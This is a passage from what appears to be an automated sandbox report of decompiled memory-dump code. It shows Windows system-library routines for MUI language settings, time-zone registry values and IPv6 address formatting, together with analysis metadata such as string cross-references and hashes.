                                                                                                                                                        							_t261 = E008DE679(_v12, _t332);
                                                                                                                                                        							_pop(_t322);
                                                                                                                                                        						}
                                                                                                                                                        						_t269 = _v16;
                                                                                                                                                        						if( *_v16 != _t318) {
                                                                                                                                                        							E008CE2A8(_t322,  &_v68, _t269);
                                                                                                                                                        							if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        								_a4 = _a4 + 1;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						if(_a4 == _t318) {
                                                                                                                                                        							E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                        							_v40 = _t318;
                                                                                                                                                        							_v20 = _t318;
                                                                                                                                                        						}
                                                                                                                                                        						if(_v8 != _t318) {
                                                                                                                                                        							E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        						}
                                                                                                                                                        						_v8 = _t318;
                                                                                                                                                        						goto L30;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				_t284 = _v24;
                                                                                                                                                        				_t322 = _t284 + 4;
                                                                                                                                                        				_push(_t284);
                                                                                                                                                        				_v48 = _t322;
                                                                                                                                                        				E008E718A(_t284);
                                                                                                                                                        				_t339 = _t335 + 4;
                                                                                                                                                        				if(_t322 == _t318) {
                                                                                                                                                        					_v28 = _t318;
                                                                                                                                                        				} else {
                                                                                                                                                        					_v28 = E008CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                        				}
                                                                                                                                                        				if(_v28 == _t318) {
                                                                                                                                                        					_v48 = _t318;
                                                                                                                                                        					goto L58;
                                                                                                                                                        				} else {
                                                                                                                                                        					E008C2340(_v28, _v8, _v24);
                                                                                                                                                        					_v16 = _v28;
                                                                                                                                                        					_a4 = _t318;
                                                                                                                                                        					_t288 = E008DE679(_v28, _t332);
                                                                                                                                                        					_t335 = _t339 + 0x14;
                                                                                                                                                        					while(1) {
                                                                                                                                                        						_v12 = _t288;
                                                                                                                                                        						if(_t288 == _t318) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						_v12 = _v12 + 2;
                                                                                                                                                        						 *_v12 = 0;
                                                                                                                                                        						E008CE2A8(_v12,  &_v68, _v16);
                                                                                                                                                        						if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        							_a4 = _a4 + 1;
                                                                                                                                                        						}
                                                                                                                                                        						_v16 = _v12;
                                                                                                                                                        						_t288 = E008DE679(_v12, _t332);
                                                                                                                                                        						_pop(_t322);
                                                                                                                                                        					}
                                                                                                                                                        					_t296 = _v16;
                                                                                                                                                        					if( *_v16 != _t318) {
                                                                                                                                                        						E008CE2A8(_t322,  &_v68, _t296);
                                                                                                                                                        						if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        							_a4 = _a4 + 1;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					if(_a4 == _t318) {
                                                                                                                                                        						E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                        						_v48 = _t318;
                                                                                                                                                        						_v28 = _t318;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v8 != _t318) {
                                                                                                                                                        						E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        					}
                                                                                                                                                        					_v8 = _t318;
                                                                                                                                                        					goto L17;
                                                                                                                                                        				}
                                                                                                                                                        			}

                                                                                                                                                        0x00931b4f
                                                                                                                                                        0x00931b55
                                                                                                                                                        0x00931b55
                                                                                                                                                        0x008e88a4
                                                                                                                                                        0x008e88aa
                                                                                                                                                        0x008e88b1
                                                                                                                                                        0x008e88c5
                                                                                                                                                        0x00931b5b
                                                                                                                                                        0x00931b5b
                                                                                                                                                        0x008e88c5
                                                                                                                                                        0x008e88ce
                                                                                                                                                        0x008e88e0
                                                                                                                                                        0x008e88e5
                                                                                                                                                        0x008e88e8
                                                                                                                                                        0x008e88e8
                                                                                                                                                        0x008e88ee
                                                                                                                                                        0x008e8900
                                                                                                                                                        0x008e8900
                                                                                                                                                        0x008e8905
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e8905

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 008E8827
                                                                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 008E87E6
                                                                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 008E89FC
                                                                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 008E8914
                                                                                                                                                        • WindowsExcludedProcs, xrefs: 008E87C1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcspbrk
                                                                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                        • API String ID: 402402107-258546922
                                                                                                                                                        • Opcode ID: e18aa1027c2942479923e49f39e2355ef77efa63e43858139714a15a15f3c447
                                                                                                                                                        • Instruction ID: 989a5ba387ad8747fc3b249e53e88b119af3be77e530e09ced25795112581c8e
                                                                                                                                                        • Opcode Fuzzy Hash: e18aa1027c2942479923e49f39e2355ef77efa63e43858139714a15a15f3c447
                                                                                                                                                        • Instruction Fuzzy Hash: 65F1D6B1D00249EFCB11EF99C981EEEBBB8FB09304F14446AE505E7261EB34DA45DB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                        			E0095822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
                                                                                                                                                        				char _v8;
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				signed int _t41;
                                                                                                                                                        				void* _t42;
                                                                                                                                                        				signed int* _t50;
                                                                                                                                                        				void* _t71;
                                                                                                                                                        				void* _t73;
                                                                                                                                                        				void* _t78;
                                                                                                                                                        				signed int _t81;
                                                                                                                                                        				void* _t84;
                                                                                                                                                        
                                                                                                                                                        				_push(__ecx);
                                                                                                                                                        				_t81 = _a4;
                                                                                                                                                        				_t84 = 0x20;
                                                                                                                                                        				_t71 = E00975A34(_t81 + 4, _t84);
                                                                                                                                                        				if(_t71 < _t84) {
                                                                                                                                                        					_t41 = E00975A34(_t81 + 0x58, _t84);
                                                                                                                                                        					_pop(_t78);
                                                                                                                                                        					_a4 = _t41;
                                                                                                                                                        					__eflags = _t41 - _t84;
                                                                                                                                                        					if(_t41 >= _t84) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					} else {
                                                                                                                                                        						_t42 = E00917DCD(1,  &_v8);
                                                                                                                                                        						__eflags = _t42;
                                                                                                                                                        						if(__eflags >= 0) {
                                                                                                                                                        							__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
                                                                                                                                                        							if(__eflags < 0) {
                                                                                                                                                        								L14:
                                                                                                                                                        								_a4 = 0;
                                                                                                                                                        								_t73 = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
                                                                                                                                                        								__eflags = _t73;
                                                                                                                                                        								if(__eflags >= 0) {
                                                                                                                                                        									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
                                                                                                                                                        									_t50 =  &_a8;
                                                                                                                                                        									goto L16;
                                                                                                                                                        								}
                                                                                                                                                        							} else {
                                                                                                                                                        								_t8 = _t71 + 2; // 0x2
                                                                                                                                                        								__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                        									goto L14;
                                                                                                                                                        								} else {
                                                                                                                                                        									_t71 = 4;
                                                                                                                                                        									__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
                                                                                                                                                        									if(__eflags < 0) {
                                                                                                                                                        										goto L14;
                                                                                                                                                        									} else {
                                                                                                                                                        										__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
                                                                                                                                                        										if(__eflags < 0) {
                                                                                                                                                        											goto L14;
                                                                                                                                                        										} else {
                                                                                                                                                        											__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
                                                                                                                                                        											if(__eflags < 0) {
                                                                                                                                                        												goto L14;
                                                                                                                                                        											} else {
                                                                                                                                                        												__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
                                                                                                                                                        												if(__eflags < 0) {
                                                                                                                                                        													goto L14;
                                                                                                                                                        												} else {
                                                                                                                                                        													__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
                                                                                                                                                        													if(__eflags < 0) {
                                                                                                                                                        														goto L14;
                                                                                                                                                        													} else {
                                                                                                                                                        														__eflags = _a8 - 0x1b0;
                                                                                                                                                        														if(__eflags < 0) {
                                                                                                                                                        															goto L14;
                                                                                                                                                        														} else {
                                                                                                                                                        															_t73 = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
                                                                                                                                                        															__eflags = _t73;
                                                                                                                                                        															if(__eflags >= 0) {
                                                                                                                                                        																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
                                                                                                                                                        																_t50 =  &_a4;
                                                                                                                                                        																L16:
                                                                                                                                                        																_t73 = E0095810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
                                                                                                                                                        															}
                                                                                                                                                        														}
                                                                                                                                                        													}
                                                                                                                                                        												}
                                                                                                                                                        											}
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        							E008BF9F0(_v8);
                                                                                                                                                        							_t42 = _t73;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					L1:
                                                                                                                                                        					_t42 = 0xc000000d;
                                                                                                                                                        				}
                                                                                                                                                        				return _t42;
                                                                                                                                                        			}













                                                                                                                                                        0x009582d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009582dd
                                                                                                                                                        0x009582f3
                                                                                                                                                        0x009582f5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009582fb
                                                                                                                                                        0x00958317
                                                                                                                                                        0x00958319
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0095831b
                                                                                                                                                        0x00958332
                                                                                                                                                        0x00958334
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00958336
                                                                                                                                                        0x0095834f
                                                                                                                                                        0x00958351
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00958353
                                                                                                                                                        0x00958353
                                                                                                                                                        0x0095835a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0095835c
                                                                                                                                                        0x00958378
                                                                                                                                                        0x0095837a
                                                                                                                                                        0x0095837c
                                                                                                                                                        0x00958385
                                                                                                                                                        0x00958388
                                                                                                                                                        0x009583bc
                                                                                                                                                        0x009583cf
                                                                                                                                                        0x009583cf
                                                                                                                                                        0x0095837c
                                                                                                                                                        0x0095835a
                                                                                                                                                        0x00958351
                                                                                                                                                        0x00958334
                                                                                                                                                        0x00958319
                                                                                                                                                        0x009582f5
                                                                                                                                                        0x009582d7
                                                                                                                                                        0x009582b8
                                                                                                                                                        0x009583d4
                                                                                                                                                        0x009583d9
                                                                                                                                                        0x009583d9
                                                                                                                                                        0x00958277
                                                                                                                                                        0x0095824d
                                                                                                                                                        0x0095824d
                                                                                                                                                        0x0095824d
                                                                                                                                                        0x0095824d
                                                                                                                                                        0x009583df

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
• Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsnlen
                                                                                                                                                        • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                                                                        • API String ID: 3628947076-1387797911
                                                                                                                                                        • Opcode ID: f067e27b1dc82437359fb0ae671f6da3ea0774abbb3a78f4b06307b0f815b6aa
                                                                                                                                                        • Instruction ID: 4b8a5538219a1860f8278971288c4abce525327bdaafd77f7d56552f31a0676f
                                                                                                                                                        • Opcode Fuzzy Hash: f067e27b1dc82437359fb0ae671f6da3ea0774abbb3a78f4b06307b0f815b6aa
                                                                                                                                                        • Instruction Fuzzy Hash: CA41C775349609BAEB01DAD2CD42FEFB76CAF44B85F100111BE04F5191DBB0DB498BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 38%
                                                                                                                                                        			E009013CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                        				char _v8;
                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                        				intOrPtr* _v16;
                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                        				char _v24;
                                                                                                                                                        				intOrPtr _t71;
                                                                                                                                                        				signed int _t78;
                                                                                                                                                        				signed int _t86;
                                                                                                                                                        				char _t90;
                                                                                                                                                        				signed int _t91;
                                                                                                                                                        				signed int _t96;
                                                                                                                                                        				intOrPtr _t108;
                                                                                                                                                        				signed int _t114;
                                                                                                                                                        				void* _t115;
                                                                                                                                                        				intOrPtr _t128;
                                                                                                                                                        				intOrPtr* _t129;
                                                                                                                                                        				void* _t130;
                                                                                                                                                        
                                                                                                                                                        				_t129 = _a4;
                                                                                                                                                        				_t128 = _a8;
                                                                                                                                                        				_t116 = 0;
                                                                                                                                                        				_t71 = _t128 + 0x5c;
                                                                                                                                                        				_v8 = 8;
                                                                                                                                                        				_v20 = _t71;
                                                                                                                                                        				if( *_t129 == 0) {
                                                                                                                                                        					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                        						goto L5;
                                                                                                                                                        					} else {
                                                                                                                                                        						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                        						if(_t96 != 0) {
                                                                                                                                                        							L38:
                                                                                                                                                        							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                        								goto L5;
                                                                                                                                                        							} else {
                                                                                                                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                        								_t86 = E008F7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                        								L36:
                                                                                                                                                        								return _t128 + _t86 * 2;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                        						if(_t114 == 0) {
                                                                                                                                                        							L33:
                                                                                                                                                        							_t115 = 0x8c2926;
                                                                                                                                                        							L35:
                                                                                                                                                        							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                        							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                        							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                        							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                        							_t86 = E008F7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                        							goto L36;
                                                                                                                                                        						}
                                                                                                                                                        						if(_t114 != 0xffff) {
                                                                                                                                                        							_t116 = 0;
                                                                                                                                                        							goto L38;
                                                                                                                                                        						}
                                                                                                                                                        						if(_t114 != 0) {
                                                                                                                                                        							_t115 = 0x8c9cac;
                                                                                                                                                        							goto L35;
                                                                                                                                                        						}
                                                                                                                                                        						goto L33;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					L5:
                                                                                                                                                        					_a8 = _t116;
                                                                                                                                                        					_a4 = _t116;
                                                                                                                                                        					_v12 = _t116;
                                                                                                                                                        					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                        						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                        							_v8 = 6;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_t90 = _v8;
                                                                                                                                                        					if(_t90 <= _t116) {
                                                                                                                                                        						L11:
                                                                                                                                                        						if(_a8 - _a4 <= 1) {
                                                                                                                                                        							_a8 = _t116;
                                                                                                                                                        							_a4 = _t116;
                                                                                                                                                        						}
                                                                                                                                                        						_t91 = 0;
                                                                                                                                                        						if(_v8 <= _t116) {
                                                                                                                                                        							L22:
                                                                                                                                                        							if(_v8 < 8) {
                                                                                                                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                        								_t128 = _t128 + E008F7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                        							}
                                                                                                                                                        							return _t128;
                                                                                                                                                        						} else {
                                                                                                                                                        							L14:
                                                                                                                                                        							L14:
                                                                                                                                                        							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                        								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                        									_push(":");
                                                                                                                                                        									_push(_t71 - _t128 >> 1);
                                                                                                                                                        									_push(_t128);
                                                                                                                                                        									_t128 = _t128 + E008F7707() * 2;
                                                                                                                                                        									_t71 = _v20;
                                                                                                                                                        									_t130 = _t130 + 0xc;
                                                                                                                                                        								}
                                                                                                                                                        								_t78 = E008F7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                        								_t130 = _t130 + 0x10;
                                                                                                                                                        							} else {
                                                                                                                                                        								_push(L"::");
                                                                                                                                                        								_push(_t71 - _t128 >> 1);
                                                                                                                                                        								_push(_t128);
                                                                                                                                                        								_t78 = E008F7707();
                                                                                                                                                        								_t130 = _t130 + 0xc;
                                                                                                                                                        								_t91 = _a8 - 1;
                                                                                                                                                        							}
                                                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                                                        							_t128 = _t128 + _t78 * 2;
                                                                                                                                                        							_t71 = _v20;
                                                                                                                                                        							if(_t91 >= _v8) {
                                                                                                                                                        								goto L22;
                                                                                                                                                        							}
                                                                                                                                                        							_t116 = 0;
                                                                                                                                                        							goto L14;
                                                                                                                                                        						}
                                                                                                                                                        					} else {
                                                                                                                                                        						_t108 = 1;
                                                                                                                                                        						_v16 = _t129;
                                                                                                                                                        						_v24 = _t90;
                                                                                                                                                        						do {
                                                                                                                                                        							if( *_v16 == _t116) {
                                                                                                                                                        								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                        									_a4 = _v12;
                                                                                                                                                        									_a8 = _t108;
                                                                                                                                                        								}
                                                                                                                                                        								_t116 = 0;
                                                                                                                                                        							} else {
                                                                                                                                                        								_v12 = _t108;
                                                                                                                                                        							}
                                                                                                                                                        							_v16 = _v16 + 2;
                                                                                                                                                        							_t108 = _t108 + 1;
                                                                                                                                                        							_t26 =  &_v24;
                                                                                                                                                        							 *_t26 = _v24 - 1;
                                                                                                                                                        						} while ( *_t26 != 0);
                                                                                                                                                        						goto L11;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        			}





















                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                        • Opcode ID: 937953ed3182704c770eb6fef624c719519ecc7aca5451cb0d39e678ab9dd9df
                                                                                                                                                        • Instruction ID: 26dd280639aa35ff1518d688614d283b3e45a4d6647a5f07612772d2cd1dfbaf
                                                                                                                                                        • Opcode Fuzzy Hash: 937953ed3182704c770eb6fef624c719519ecc7aca5451cb0d39e678ab9dd9df
                                                                                                                                                        • Instruction Fuzzy Hash: 576137B5900655AECB24DF6DC8808BFBBB9FF94300B54C56EF5D687691D334AA80CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                        			E00963B8E(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                        				char _v12;
                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                        				char _v20;
                                                                                                                                                        				void* _t84;
                                                                                                                                                        				void* _t87;
                                                                                                                                                        				intOrPtr* _t97;
                                                                                                                                                        				void* _t104;
                                                                                                                                                        				void* _t106;
                                                                                                                                                        				void* _t109;
                                                                                                                                                        				intOrPtr _t116;
                                                                                                                                                        				signed int _t117;
                                                                                                                                                        				signed int _t122;
                                                                                                                                                        				signed int _t126;
                                                                                                                                                        				char _t127;
                                                                                                                                                        				signed int _t128;
                                                                                                                                                        				intOrPtr* _t133;
                                                                                                                                                        				void* _t134;
                                                                                                                                                        
                                                                                                                                                        				_t133 = _a4;
                                                                                                                                                        				_t122 = 0;
                                                                                                                                                        				_t109 = _a8 + 0x2e;
                                                                                                                                                        				_v12 = 8;
                                                                                                                                                        				if( *_t133 != 0 ||  *((intOrPtr*)(_t133 + 2)) != 0 ||  *((intOrPtr*)(_t133 + 4)) != 0 ||  *((intOrPtr*)(_t133 + 6)) != 0 ||  *(_t133 + 0xc) == 0) {
                                                                                                                                                        					L17:
                                                                                                                                                        					_a4 = _t122;
                                                                                                                                                        					_v8 = _t122;
                                                                                                                                                        					_v16 = _t122;
                                                                                                                                                        					if(( *(_t133 + 8) & 0x0000fffd) == 0 &&  *(_t133 + 0xa) == 0xfe5e) {
                                                                                                                                                        						_v12 = 6;
                                                                                                                                                        					}
                                                                                                                                                        					_t127 = _v12;
                                                                                                                                                        					if(_t127 <= _t122) {
                                                                                                                                                        						L27:
                                                                                                                                                        						if(_a4 - _v8 <= 1) {
                                                                                                                                                        							_a4 = _t122;
                                                                                                                                                        							_v8 = _t122;
                                                                                                                                                        						}
                                                                                                                                                        						_t128 = 0;
                                                                                                                                                        						if(_v12 > _t122) {
                                                                                                                                                        							L33:
                                                                                                                                                        							if(_v8 > _t128 || _t128 >= _a4) {
                                                                                                                                                        								if(_t128 != _t122 && _t128 != _a4) {
                                                                                                                                                        									_push(0x8c9c7e);
                                                                                                                                                        									_push(_t109 - _a8);
                                                                                                                                                        									_push(_a8);
                                                                                                                                                        									_t87 = E0097894A();
                                                                                                                                                        									_t134 = _t134 + 0xc;
                                                                                                                                                        									_a8 = _a8 + _t87;
                                                                                                                                                        								}
                                                                                                                                                        								_t84 = E0097894A(_a8, _t109 - _a8, 0x8c9c7a,  *(_t133 + _t128 * 2) & 0x0000ffff);
                                                                                                                                                        								_t134 = _t134 + 0x10;
                                                                                                                                                        								_a8 = _a8 + _t84;
                                                                                                                                                        							} else {
                                                                                                                                                        								_push(0x8c9c80);
                                                                                                                                                        								_push(_t109 - _a8);
                                                                                                                                                        								_push(_a8);
                                                                                                                                                        								_a8 = _a8 + E0097894A();
                                                                                                                                                        								_t134 = _t134 + 0xc;
                                                                                                                                                        								_t128 = _a4 - 1;
                                                                                                                                                        							}
                                                                                                                                                        							_t128 = _t128 + 1;
                                                                                                                                                        							if(_t128 < _v12) {
                                                                                                                                                        								goto L32;
                                                                                                                                                        							}
                                                                                                                                                        							goto L41;
                                                                                                                                                        							L32:
                                                                                                                                                        							_t122 = 0;
                                                                                                                                                        							goto L33;
                                                                                                                                                        						} else {
                                                                                                                                                        							L41:
                                                                                                                                                        							if(_v12 < 8) {
                                                                                                                                                        								_push( *(_t133 + 0xf) & 0x000000ff);
                                                                                                                                                        								_push( *(_t133 + 0xe) & 0x000000ff);
                                                                                                                                                        								_push( *(_t133 + 0xd) & 0x000000ff);
                                                                                                                                                        								_a8 = _a8 + E0097894A(_a8, _t109 - _a8, ":%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
                                                                                                                                                        							}
                                                                                                                                                        							return _a8;
                                                                                                                                                        						}
                                                                                                                                                        					} else {
                                                                                                                                                        						_t116 = 1;
                                                                                                                                                        						_t97 = _t133;
                                                                                                                                                        						_v20 = _t127;
                                                                                                                                                        						do {
                                                                                                                                                        							if( *_t97 != _t122) {
                                                                                                                                                        								_v16 = _t116;
                                                                                                                                                        							} else {
                                                                                                                                                        								if(_t116 - _v16 > _a4 - _v8) {
                                                                                                                                                        									_v8 = _v16;
                                                                                                                                                        									_a4 = _t116;
                                                                                                                                                        								}
                                                                                                                                                        								_t122 = 0;
                                                                                                                                                        							}
                                                                                                                                                        							_t97 = _t97 + 2;
                                                                                                                                                        							_t116 = _t116 + 1;
                                                                                                                                                        							_t40 =  &_v20;
                                                                                                                                                        							 *_t40 = _v20 - 1;
                                                                                                                                                        						} while ( *_t40 != 0);
                                                                                                                                                        						goto L27;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					_t126 =  *(_t133 + 8) & 0x0000ffff;
                                                                                                                                                        					if(_t126 != 0) {
                                                                                                                                                        						L13:
                                                                                                                                                        						if(_t126 != 0xffff ||  *(_t133 + 0xa) != 0) {
                                                                                                                                                        							_t122 = 0;
                                                                                                                                                        							goto L17;
                                                                                                                                                        						} else {
                                                                                                                                                        							_push( *(_t133 + 0xf) & 0x000000ff);
                                                                                                                                                        							_push( *(_t133 + 0xe) & 0x000000ff);
                                                                                                                                                        							_push( *(_t133 + 0xd) & 0x000000ff);
                                                                                                                                                        							_t104 = E0097894A(_a8, _t109 - _a8, "::ffff:0:%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
                                                                                                                                                        							L12:
                                                                                                                                                        							return _t104 + _a8;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_t117 =  *(_t133 + 0xa) & 0x0000ffff;
                                                                                                                                                        					if(_t117 == 0) {
                                                                                                                                                        						L9:
                                                                                                                                                        						_t106 = 0x8c2926;
                                                                                                                                                        						L11:
                                                                                                                                                        						_push( *(_t133 + 0xf) & 0x000000ff);
                                                                                                                                                        						_push( *(_t133 + 0xe) & 0x000000ff);
                                                                                                                                                        						_push( *(_t133 + 0xd) & 0x000000ff);
                                                                                                                                                        						_push( *(_t133 + 0xc) & 0x000000ff);
